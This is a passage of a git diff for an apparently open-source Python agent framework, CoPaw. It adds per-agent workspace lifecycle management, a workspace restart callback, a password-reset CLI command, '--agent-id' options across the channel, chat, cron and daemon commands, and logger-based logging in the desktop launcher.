all components concurrently.""" + if self._started: + logger.debug(f"Workspace already started: {self.agent_id}") + return + + logger.info(f"Starting workspace: {self.agent_id}") + + try: + # 1. Load agent configuration from workspace/agent.json + self._config = load_agent_config(self.agent_id) + agent_config = self._config + logger.debug(f"Loaded config for agent: {self.agent_id}") + + # 2. Create Runner + self._runner = AgentRunner( + agent_id=self.agent_id, + workspace_dir=self.workspace_dir, + ) + + # 3. Concurrently initialize MemoryManager and MCPManager + # IMPORTANT: Create MemoryManager BEFORE runner.start() to prevent + # init_handler from creating a duplicate MemoryManager + async def init_memory(): + try: + self._memory_manager = MemoryManager( + working_dir=str(self.workspace_dir), + agent_config=agent_config, + ) + # Assign to runner BEFORE starting runner + self._runner.memory_manager = self._memory_manager + await self._memory_manager.start() + logger.debug( + f"MemoryManager started for agent: {self.agent_id}", + ) + except Exception as e: + logger.exception( + f"Failed to initialize MemoryManager for agent " + f"{self.agent_id}: {e}", + ) + + async def init_mcp(): + try: + self._mcp_manager = MCPClientManager() + if agent_config.mcp: + try: + await self._mcp_manager.init_from_config( + agent_config.mcp, + ) + logger.debug( + f"MCP clients initialized for agent: " + f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Failed to initialize MCP for agent " + f"{self.agent_id}: {e}", + ) + self._runner.set_mcp_manager(self._mcp_manager) + except Exception as e: + logger.exception( + f"Failed to initialize MCPClientManager for agent " + f"{self.agent_id}: {e}", + ) + + async def init_chat(): + try: + from .runner.manager import ChatManager + from .runner.repo.json_repo import JsonChatRepository + + chats_path = str(self.workspace_dir / "chats.json") + chat_repo = JsonChatRepository(chats_path) + self._chat_manager = 
ChatManager(repo=chat_repo)
+                    self._runner.set_chat_manager(self._chat_manager)
+                    logger.info(
+                        f"ChatManager started for agent {self.agent_id}: "
+                        f"chats.json={chats_path}",
+                    )
+                except Exception as e:
+                    logger.exception(
+                        f"Failed to initialize ChatManager for agent "
+                        f"{self.agent_id}: {e}",
+                    )
+
+            # Run Memory, MCP, and Chat initialization concurrently.
+            # This must happen BEFORE runner.start(): init_memory assigns
+            # the MemoryManager to the runner, and starting the runner
+            # first would let init_handler create a duplicate.
+            await asyncio.gather(init_memory(), init_mcp(), init_chat())
+
+            # Now start the runner (after MemoryManager is set)
+            await self._runner.start()
+            logger.debug(f"Runner started for agent: {self.agent_id}")
+
+            # Set up restart callback for /daemon restart command
+            from .workspace_restart import create_restart_callback
+
+            setattr(
+                self._runner,
+                "_restart_callback",
+                create_restart_callback(self),
+            )
+
+            # 4. Start ChannelManager (depends on Runner)
+            if agent_config.channels:
+                from ..config import Config, update_last_dispatch
+                from .channels.manager import ChannelManager
+
+                temp_config = Config(channels=agent_config.channels)
+
+                # Create a closure to bind agent_id to update_last_dispatch
+                def on_last_dispatch_with_agent_id(
+                    channel: str,
+                    user_id: str,
+                    session_id: str,
+                ) -> None:
+                    update_last_dispatch(
+                        channel=channel,
+                        user_id=user_id,
+                        session_id=session_id,
+                        agent_id=self.agent_id,
+                    )
+
+                self._channel_manager = ChannelManager.from_config(
+                    process=make_process_from_runner(self._runner),
+                    config=temp_config,
+                    on_last_dispatch=on_last_dispatch_with_agent_id,
+                    workspace_dir=self.workspace_dir,
+                )
+                await self._channel_manager.start_all()
+                logger.debug(
+                    f"ChannelManager started for agent: {self.agent_id}",
+                )
+
+            # 5.
Start CronManager (always start for API access and cron jobs) + job_repo = JsonJobRepository( + str(self.workspace_dir / "jobs.json"), + ) + self._cron_manager = CronManager( + repo=job_repo, + runner=self._runner, + channel_manager=self._channel_manager, + timezone="UTC", + agent_id=self.agent_id, + ) + # Always start CronManager (it will register cron jobs and + # optionally add heartbeat based on config) + await self._cron_manager.start() + + heartbeat_status = ( + "enabled" + if (agent_config.heartbeat and agent_config.heartbeat.enabled) + else "disabled" + ) + logger.debug( + f"CronManager started for agent {self.agent_id} " + f"(heartbeat: {heartbeat_status})", + ) + + # 6. Start config watchers for hot-reload (non-blocking) + await self._start_config_watchers() + + self._started = True + logger.info( + f"Workspace started successfully: {self.agent_id}", + ) + + except Exception as e: + logger.error( + f"Failed to start agent instance {self.agent_id}: {e}", + ) + # Clean up partially started components + await self.stop() + raise + + async def stop(self): + """Stop agent instance and clean up all resources.""" + if not self._started: + logger.debug(f"Workspace not started: {self.agent_id}") + return + + logger.info(f"Stopping agent instance: {self.agent_id}") + + # Stop components in reverse order + + # 0. Stop config watchers first + await self._stop_config_watchers() + + # 1. Stop CronManager + if self._cron_manager: + try: + await self._cron_manager.stop() + logger.debug( + f"CronManager stopped for agent: {self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping CronManager for agent " + f"{self.agent_id}: {e}", + ) + + # 2. Stop ChannelManager + if self._channel_manager: + try: + await self._channel_manager.stop_all() + logger.debug( + f"ChannelManager stopped for agent: {self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping ChannelManager for agent " + f"{self.agent_id}: {e}", + ) + + # 3. 
Stop MCPClientManager + if self._mcp_manager: + try: + await self._mcp_manager.close_all() + logger.debug( + f"MCPClientManager stopped for agent: " f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping MCPClientManager for agent " + f"{self.agent_id}: {e}", + ) + + # 4. Stop MemoryManager + if self._memory_manager: + try: + await self._memory_manager.close() + logger.debug( + f"MemoryManager stopped for agent: " f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping MemoryManager for agent " + f"{self.agent_id}: {e}", + ) + + # 5. Clear ChatManager reference (no stop method) + if self._chat_manager: + self._chat_manager = None + logger.debug( + f"ChatManager cleared for agent: {self.agent_id}", + ) + + # 6. Stop Runner + if self._runner: + try: + await self._runner.stop() + logger.debug(f"Runner stopped for agent: {self.agent_id}") + except Exception as e: + logger.warning( + f"Error stopping Runner for agent {self.agent_id}: {e}", + ) + + self._started = False + logger.info(f"Workspace stopped: {self.agent_id}") + + async def reload(self): + """Reload agent instance (stop and start with fresh configuration).""" + logger.info(f"Reloading agent instance: {self.agent_id}") + self._config = None # Clear cached config + await self.stop() + await self.start() + logger.info(f"Agent instance reloaded: {self.agent_id}") + + async def _start_config_watchers(self): + """Start config watchers for hot-reload of agent.json changes.""" + try: + # Start AgentConfigWatcher for channels and heartbeat + if self._channel_manager or self._cron_manager: + from .agent_config_watcher import AgentConfigWatcher + + self._config_watcher = AgentConfigWatcher( + agent_id=self.agent_id, + workspace_dir=self.workspace_dir, + channel_manager=self._channel_manager, + cron_manager=self._cron_manager, + ) + await self._config_watcher.start() + + # Start MCPConfigWatcher for MCP client hot-reload + if self._mcp_manager: + from 
.mcp.watcher import MCPConfigWatcher + + def mcp_config_loader(): + """Load MCP config from agent.json.""" + agent_config = load_agent_config(self.agent_id) + return agent_config.mcp + + self._mcp_config_watcher = MCPConfigWatcher( + mcp_manager=self._mcp_manager, + config_loader=mcp_config_loader, + config_path=self.workspace_dir / "agent.json", + ) + await self._mcp_config_watcher.start() + + except Exception as e: + logger.warning( + f"Failed to start config watchers for agent " + f"{self.agent_id}: {e}", + ) + + async def _stop_config_watchers(self): + """Stop config watchers.""" + if self._config_watcher: + try: + await self._config_watcher.stop() + except Exception as e: + logger.warning( + f"Error stopping AgentConfigWatcher for agent " + f"{self.agent_id}: {e}", + ) + self._config_watcher = None + + if self._mcp_config_watcher: + try: + await self._mcp_config_watcher.stop() + except Exception as e: + logger.warning( + f"Error stopping MCPConfigWatcher for agent " + f"{self.agent_id}: {e}", + ) + self._mcp_config_watcher = None + + def __repr__(self) -> str: + """String representation of workspace.""" + status = "started" if self._started else "stopped" + return ( + f"Workspace(id={self.agent_id}, " + f"workspace={self.workspace_dir}, " + f"status={status})" + ) diff --git a/src/copaw/app/workspace_restart.py b/src/copaw/app/workspace_restart.py new file mode 100644 index 000000000..5f2f50f2a --- /dev/null +++ b/src/copaw/app/workspace_restart.py @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +"""Workspace-level restart logic. + +This module provides workspace-scoped restart functionality for the +/daemon restart command. Each workspace can reload its own components +(channels, cron, MCP) without affecting other workspaces. 
+""" +from __future__ import annotations + +import logging +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from .workspace import Workspace + +logger = logging.getLogger(__name__) + + +async def restart_workspace(workspace: "Workspace") -> None: + """Restart a single workspace's components (channels, cron, MCP). + + This function performs an in-process reload of workspace components: + 1. Reloads agent configuration from agent.json + 2. Calls workspace.reload() to restart managers + + Args: + workspace: The workspace instance to restart + + Raises: + Exception: If restart fails + """ + logger.info(f"Restarting workspace: {workspace.agent_id}") + + try: + # Reload the workspace (hot reload all managers) + await workspace.reload() + + logger.info( + f"Workspace restart completed: {workspace.agent_id}", + ) + + except Exception as e: + logger.exception( + f"Failed to restart workspace {workspace.agent_id}: {e}", + ) + raise + + +def create_restart_callback(workspace: "Workspace"): + """Create a restart callback for a workspace's runner. + + This creates a closure that captures the workspace instance and + provides it as a callback for the /daemon restart command. 
+ + Args: + workspace: The workspace instance + + Returns: + Async callable that restarts the workspace + """ + + async def _restart_callback() -> None: + """Restart callback for runner.""" + await restart_workspace(workspace) + + return _restart_callback diff --git a/src/copaw/cli/auth_cmd.py b/src/copaw/cli/auth_cmd.py new file mode 100644 index 000000000..61235b055 --- /dev/null +++ b/src/copaw/cli/auth_cmd.py @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +from __future__ import annotations + +import secrets + +import click + +from ..app.auth import ( + _hash_password, + _load_auth_data, + _save_auth_data, + is_auth_enabled, +) + + +@click.group("auth", help="Manage web authentication.") +def auth_group() -> None: + """Manage web authentication.""" + + +@auth_group.command("reset-password") +def reset_password_cmd() -> None: + """Reset the password for the registered web user.""" + if not is_auth_enabled(): + click.echo( + "Authentication is not enabled.\n" + "Set COPAW_AUTH_ENABLED=true to enable it first.", + ) + return + + data = _load_auth_data() + + if data.get("_auth_load_error"): + raise click.ClickException( + "Failed to read auth data. Check auth.json for corruption.", + ) + + user = data.get("user") + if not user: + click.echo("No registered user found. Nothing to reset.") + return + + username = user.get("username", "") + click.echo(f"Resetting password for user: {username}") + + new_password = click.prompt( + "New password", + hide_input=True, + confirmation_prompt=True, + ) + + if not new_password or not new_password.strip(): + raise click.ClickException("Password cannot be empty.") + + pw_hash, salt = _hash_password(new_password) + data["user"]["password_hash"] = pw_hash + data["user"]["password_salt"] = salt + + # Invalidate existing tokens by rotating jwt_secret + data["jwt_secret"] = secrets.token_hex(32) + + _save_auth_data(data) + click.echo( + "✓ Password reset successfully. 
" + "All existing sessions have been invalidated.", + ) diff --git a/src/copaw/cli/channels_cmd.py b/src/copaw/cli/channels_cmd.py index 7c8a040e1..d682a4ee5 100644 --- a/src/copaw/cli/channels_cmd.py +++ b/src/copaw/cli/channels_cmd.py @@ -3,6 +3,7 @@ from __future__ import annotations from types import SimpleNamespace +from pathlib import Path import click @@ -21,6 +22,8 @@ IMessageChannelConfig, QQConfig, VoiceChannelConfig, + load_agent_config, + save_agent_config, ) from .utils import prompt_confirm, prompt_path, prompt_select from ..config import get_available_channels @@ -30,6 +33,7 @@ get_channel_registry, ) + # Fields that contain secrets — display masked in ``list`` _SECRET_FIELDS = { "bot_token", @@ -816,41 +820,51 @@ def _channel_enabled(ch) -> bool: @channels_group.command("list") -def list_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def list_cmd(agent_id: str) -> None: """Show current channel configuration.""" - config_path = get_config_path() + try: + agent_config = load_agent_config(agent_id) + click.echo(f"Channels for agent: {agent_id}\n") - if not config_path.is_file(): - click.echo(f"Config not found: {config_path}") - click.echo("Will load default config.") - click.echo("Run `copaw channels config` to create one.") - cfg = load_config() - else: - cfg = load_config(config_path) - - extra = getattr(cfg.channels, "__pydantic_extra__", None) or {} - for key, name in _get_channel_names().items(): - ch = getattr(cfg.channels, key, None) - if ch is None: - ch = extra.get(key) - if ch is None: - continue - status = ( - click.style("enabled", fg="green") - if _channel_enabled(ch) - else click.style("disabled", fg="red") - ) - click.echo(f"\n{'─' * 40}") - click.echo(f" {name} [{status}]") - click.echo(f"{'─' * 40}") + if not agent_config.channels: + click.echo("No channels configured for this agent.") + return - for field_name, value in _channel_config_fields(ch): - display = ( - 
_mask(str(value)) if field_name in _SECRET_FIELDS else value + extra = ( + getattr(agent_config.channels, "__pydantic_extra__", None) or {} + ) + for key, name in _get_channel_names().items(): + ch = getattr(agent_config.channels, key, None) + if ch is None: + ch = extra.get(key) + if ch is None: + continue + status = ( + click.style("enabled", fg="green") + if _channel_enabled(ch) + else click.style("disabled", fg="red") ) - click.echo(f" {field_name:20s}: {display}") + click.echo(f"\n{'─' * 40}") + click.echo(f" {name} [{status}]") + click.echo(f"{'─' * 40}") + + for field_name, value in _channel_config_fields(ch): + display = ( + _mask(str(value)) + if field_name in _SECRET_FIELDS + else value + ) + click.echo(f" {field_name:20s}: {display}") - click.echo() + click.echo() + except ValueError as e: + click.echo(f"Error: {e}", err=True) + raise SystemExit(1) from e def _install_channel_to_dir( @@ -872,8 +886,6 @@ def _install_channel_to_dir( dest_dir = CUSTOM_CHANNELS_DIR / key if from_path: - from pathlib import Path - src = Path(from_path).resolve() if not src.exists(): click.echo(f"Path not found: {src}", err=True) @@ -1051,17 +1063,31 @@ def remove_cmd(key: str, keep_config: bool) -> None: @channels_group.command("config") -def configure_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def configure_cmd(agent_id: str) -> None: """Interactively configure channels.""" - config_path = get_config_path() - working_dir = config_path.parent - - click.echo(f"Working dir: {working_dir}") - working_dir.mkdir(parents=True, exist_ok=True) - - existing = load_config(config_path) if config_path.is_file() else Config() + try: + agent_config = load_agent_config(agent_id) + click.echo(f"Configuring channels for agent: {agent_id}\n") + + # Create a temporary Config object for the interactive configurator + temp_config = Config() + temp_config.channels = ( + agent_config.channels + if agent_config.channels + else 
temp_config.channels + ) - configure_channels_interactive(existing) + configure_channels_interactive(temp_config) - save_config(existing, config_path) - click.echo(f"\n✓ Configuration saved to {config_path}") + # Save back to agent config + agent_config.channels = temp_config.channels + save_agent_config(agent_id, agent_config) + click.echo(f"\n✓ Configuration saved for agent {agent_id}") + except ValueError as e: + click.echo(f"Error: {e}", err=True) + raise SystemExit(1) from e diff --git a/src/copaw/cli/chats_cmd.py b/src/copaw/cli/chats_cmd.py index 2b1eea7bd..aa6b835dd 100644 --- a/src/copaw/cli/chats_cmd.py +++ b/src/copaw/cli/chats_cmd.py @@ -55,12 +55,18 @@ def chats_group() -> None: default=None, help="Override API base URL, e.g. http://127.0.0.1:8088", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def list_chats( ctx: click.Context, user_id: Optional[str], channel: Optional[str], base_url: Optional[str], + agent_id: str, ) -> None: """List all chats, optionally filtered by user_id or channel. @@ -78,7 +84,8 @@ def list_chats( if channel: params["channel"] = channel with client(base_url) as c: - r = c.get("/chats", params=params) + headers = {"X-Agent-Id": agent_id} + r = c.get("/chats", params=params, headers=headers) r.raise_for_status() print_json(r.json()) @@ -86,11 +93,17 @@ def list_chats( @chats_group.command("get") @click.argument("chat_id") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def get_chat( ctx: click.Context, chat_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """View details of a specific chat (including message history). 
@@ -103,7 +116,8 @@ def get_chat( """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/chats/{chat_id}") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/chats/{chat_id}", headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() @@ -143,6 +157,11 @@ def get_chat( ), ) @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def create_chat( ctx: click.Context, @@ -152,6 +171,7 @@ def create_chat( user_id: Optional[str], channel: str, base_url: Optional[str], + agent_id: str, ) -> None: """Create a new chat. @@ -189,7 +209,8 @@ def create_chat( "meta": {}, } with client(base_url) as c: - r = c.post("/chats", json=payload) + headers = {"X-Agent-Id": agent_id} + r = c.post("/chats", json=payload, headers=headers) r.raise_for_status() print_json(r.json()) @@ -198,12 +219,18 @@ def create_chat( @click.argument("chat_id") @click.option("--name", required=True, help="New chat name") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def update_chat( ctx: click.Context, chat_id: str, name: str, base_url: Optional[str], + agent_id: str, ) -> None: """Update chat name. 
@@ -215,10 +242,10 @@ def update_chat( copaw chats update --name "Renamed Chat" """ base_url = _base_url(ctx, base_url) - + headers = {"X-Agent-Id": agent_id} # Fetch existing spec, then patch name with client(base_url) as c: - r = c.get("/chats") + r = c.get("/chats", headers=headers) r.raise_for_status() specs = r.json() @@ -229,7 +256,7 @@ def update_chat( payload["name"] = name with client(base_url) as c: - r = c.put(f"/chats/{chat_id}", json=payload) + r = c.put(f"/chats/{chat_id}", json=payload, headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() @@ -239,11 +266,17 @@ def update_chat( @chats_group.command("delete") @click.argument("chat_id") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def delete_chat( ctx: click.Context, chat_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Delete a specific chat. @@ -258,7 +291,8 @@ def delete_chat( """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.delete(f"/chats/{chat_id}") + headers = {"X-Agent-Id": agent_id} + r = c.delete(f"/chats/{chat_id}", headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() diff --git a/src/copaw/cli/cron_cmd.py b/src/copaw/cli/cron_cmd.py index 3a8d573b5..6dd230ec5 100644 --- a/src/copaw/cli/cron_cmd.py +++ b/src/copaw/cli/cron_cmd.py @@ -42,12 +42,22 @@ def cron_group() -> None: "If omitted, uses global --host and --port from config." ), ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def list_jobs(ctx: click.Context, base_url: Optional[str]) -> None: +def list_jobs( + ctx: click.Context, + base_url: Optional[str], + agent_id: str, +) -> None: """List all cron jobs. 
Output is JSON from GET /cron/jobs.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get("/cron/jobs") + headers = {"X-Agent-Id": agent_id} + r = c.get("/cron/jobs", headers=headers) r.raise_for_status() print_json(r.json()) @@ -59,12 +69,23 @@ def list_jobs(ctx: click.Context, base_url: Optional[str]) -> None: default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def get_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: +def get_job( + ctx: click.Context, + job_id: str, + base_url: Optional[str], + agent_id: str, +) -> None: """Fetch a cron job by ID. Returns JSON from GET /cron/jobs/.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/cron/jobs/{job_id}") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/cron/jobs/{job_id}", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -78,16 +99,23 @@ def get_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def job_state( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Get the runtime state of a cron job (e.g. next run time, paused).""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/cron/jobs/{job_id}/state") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/cron/jobs/{job_id}/state", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -237,8 +265,11 @@ def _build_spec_from_cli( ) @click.option( "--timezone", - default="UTC", - help="Timezone for the cron schedule (e.g. 
UTC, America/New_York).", + default=None, + help=( + "Timezone for the cron schedule (e.g. UTC, America/New_York). " + "Defaults to the user timezone from config." + ), ) @click.option( "--enabled/--no-enabled", @@ -259,6 +290,11 @@ def _build_spec_from_cli( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def create_job( ctx: click.Context, @@ -270,10 +306,11 @@ def create_job( target_user: Optional[str], target_session: Optional[str], text: Optional[str], - timezone: str, + timezone: Optional[str], enabled: bool, mode: str, base_url: Optional[str], + agent_id: str, ) -> None: """Create a cron job. @@ -281,6 +318,10 @@ def create_job( --channel, --target-user, --target-session and --text to define the job inline. """ + if timezone is None: + from ..config import load_config + + timezone = load_config().user_timezone or "UTC" base_url = _base_url(ctx, base_url) if file_ is not None: payload = json.loads(file_.read_text(encoding="utf-8")) @@ -310,7 +351,8 @@ def create_job( mode=mode, ) with client(base_url) as c: - r = c.post("/cron/jobs", json=payload) + headers = {"X-Agent-Id": agent_id} + r = c.post("/cron/jobs", json=payload, headers=headers) r.raise_for_status() print_json(r.json()) @@ -322,16 +364,23 @@ def create_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def delete_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Permanently delete a cron job. 
The job is removed from the server.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.delete(f"/cron/jobs/{job_id}") + headers = {"X-Agent-Id": agent_id} + r = c.delete(f"/cron/jobs/{job_id}", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -345,18 +394,25 @@ def delete_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def pause_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Pause a cron job so it no longer runs on schedule. Use 'resume' to re-enable. """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/pause") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/pause", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -370,16 +426,23 @@ def pause_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def resume_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Resume a paused cron job so it runs again on its schedule.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/resume") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/resume", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -393,12 +456,23 @@ def resume_job( default=None, help="Override the API base URL. 
Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def run_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: +def run_job( + ctx: click.Context, + job_id: str, + base_url: Optional[str], + agent_id: str, +) -> None: """Trigger a one-off run of a cron job immediately (ignores schedule).""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/run") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/run", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() diff --git a/src/copaw/cli/daemon_cmd.py b/src/copaw/cli/daemon_cmd.py index 446b3e4cd..aa621f283 100644 --- a/src/copaw/cli/daemon_cmd.py +++ b/src/copaw/cli/daemon_cmd.py @@ -6,6 +6,7 @@ from __future__ import annotations import asyncio +from pathlib import Path import click @@ -18,11 +19,26 @@ run_daemon_version, ) from ..constant import WORKING_DIR +from ..config import load_config -def _context() -> DaemonContext: +def _get_agent_workspace(agent_id: str) -> Path: + """Get agent workspace directory.""" + try: + config = load_config() + if agent_id in config.agents.profiles: + ref = config.agents.profiles[agent_id] + workspace_dir = Path(ref.workspace_dir).expanduser() + return workspace_dir + except Exception: + pass + return WORKING_DIR + + +def _context(agent_id: str) -> DaemonContext: + working_dir = _get_agent_workspace(agent_id) return DaemonContext( - working_dir=WORKING_DIR, + working_dir=working_dir, memory_manager=None, restart_callback=None, ) @@ -34,30 +50,54 @@ def daemon_group() -> None: @daemon_group.command("status") -def status_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def status_cmd(agent_id: str) -> None: """Show daemon status (config, working dir, memory manager).""" - ctx = 
_context()
+    ctx = _context(agent_id)
+    click.echo(f"Agent: {agent_id}\n")
     click.echo(run_daemon_status(ctx))


 @daemon_group.command("restart")
-def restart_cmd() -> None:
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def restart_cmd(agent_id: str) -> None:
     """Print restart instructions (CLI has no process to restart)."""
-    ctx = _context()
+    ctx = _context(agent_id)
+    click.echo(f"Agent: {agent_id}\n")
     click.echo(asyncio.run(run_daemon_restart(ctx)))


 @daemon_group.command("reload-config")
-def reload_config_cmd() -> None:
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def reload_config_cmd(agent_id: str) -> None:
     """Reload config (re-read from file)."""
-    ctx = _context()
+    ctx = _context(agent_id)
+    click.echo(f"Agent: {agent_id}\n")
     click.echo(run_daemon_reload_config(ctx))


 @daemon_group.command("version")
-def version_cmd() -> None:
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def version_cmd(agent_id: str) -> None:
     """Show version and paths."""
-    ctx = _context()
+    ctx = _context(agent_id)
+    click.echo(f"Agent: {agent_id}\n")
     click.echo(run_daemon_version(ctx))
@@ -69,8 +109,14 @@ def version_cmd() -> None:
     type=int,
     help="Number of last lines to show (default 100).",
 )
-def logs_cmd(lines: int) -> None:
+@click.option(
+    "--agent-id",
+    default="default",
+    help="Agent ID (defaults to 'default')",
+)
+def logs_cmd(lines: int, agent_id: str) -> None:
     """Tail last N lines of WORKING_DIR/copaw.log."""
-    ctx = _context()
+    ctx = _context(agent_id)
     lines = min(max(1, lines), 2000)
+    click.echo(f"Agent: {agent_id}\n")
     click.echo(run_daemon_logs(ctx, lines=lines))
diff --git a/src/copaw/cli/desktop_cmd.py b/src/copaw/cli/desktop_cmd.py
index d637137ff..7aa5a29f3 100644
--- a/src/copaw/cli/desktop_cmd.py
+++ b/src/copaw/cli/desktop_cmd.py
@@ -1,24 +1,30 @@
 # -*- coding: utf-8 -*-
 """CLI command: run CoPaw app on a free port in a native webview window."""
+# pylint:disable=too-many-branches,too-many-statements,consider-using-with
 from __future__ import annotations

+import logging
 import os
 import socket
 import subprocess
 import sys
 import threading
 import time
+import traceback
 import webbrowser

 import click

 from ..constant import LOG_LEVEL_ENV
+from ..utils.logging import setup_logger

 try:
     import webview
 except ImportError:
     webview = None  # type: ignore[assignment]

+logger = logging.getLogger(__name__)
+

 class WebViewAPI:
     """API exposed to the webview for handling external links."""
@@ -52,12 +58,6 @@ def _wait_for_http(host: str, port: int, timeout_sec: float = 300.0) -> bool:
     return False


-def _log_desktop(msg: str) -> None:
-    """Print to stderr and flush (for desktop.log when launched from .app)."""
-    print(msg, file=sys.stderr)
-    sys.stderr.flush()
-
-
 def _stream_reader(in_stream, out_stream) -> None:
     """Read from in_stream line by line and write to out_stream.
@@ -106,11 +106,13 @@ def desktop_cmd(
     native webview window loading that URL. Use for a dedicated desktop
     window without conflicting with an existing CoPaw app instance.
     """
+    # Set up the desktop-command logger (separate from the backend subprocess)
+    setup_logger(log_level)
     port = _find_free_port(host)
     url = f"http://{host}:{port}"
     click.echo(f"Starting CoPaw app on {url} (port {port})")
-    _log_desktop("[desktop] Server subprocess starting...")
+    logger.info("Server subprocess starting...")

     env = os.environ.copy()
     env[LOG_LEVEL_ENV] = log_level
@@ -118,18 +120,21 @@
     if "SSL_CERT_FILE" in env:
         cert_file = env["SSL_CERT_FILE"]
         if os.path.exists(cert_file):
-            _log_desktop(f"[desktop] SSL certificate: {cert_file}")
+            logger.info(f"SSL certificate: {cert_file}")
         else:
-            _log_desktop(
-                f"[desktop] WARNING: SSL_CERT_FILE set but not found: "
-                f"{cert_file}",
+            logger.warning(
+                f"SSL_CERT_FILE set but not found: {cert_file}",
             )
     else:
-        _log_desktop("[desktop] WARNING: SSL_CERT_FILE not set")
+        logger.warning("SSL_CERT_FILE not set in the environment")

     is_windows = sys.platform == "win32"
+    proc = None
+    manually_terminated = (
+        False  # Track if we intentionally terminated the process
+    )
     try:
-        with subprocess.Popen(
+        proc = subprocess.Popen(
             [
                 sys.executable,
                 "-m",
@@ -148,7 +153,8 @@
             env=env,
             bufsize=1,
             universal_newlines=True,
-        ) as proc:
+        )
+        try:
             if is_windows:
                 stdout_thread = threading.Thread(
                     target=_stream_reader,
                     args=(proc.stdout, sys.stdout),
                 )
                 stderr_thread = threading.Thread(
                     target=_stream_reader,
                     args=(proc.stderr, sys.stderr),
                 )
                 stdout_thread.start()
                 stderr_thread.start()
-            _log_desktop("[desktop] Waiting for HTTP ready...")
+            logger.info("Waiting for HTTP ready...")
             if _wait_for_http(host, port):
-                _log_desktop(
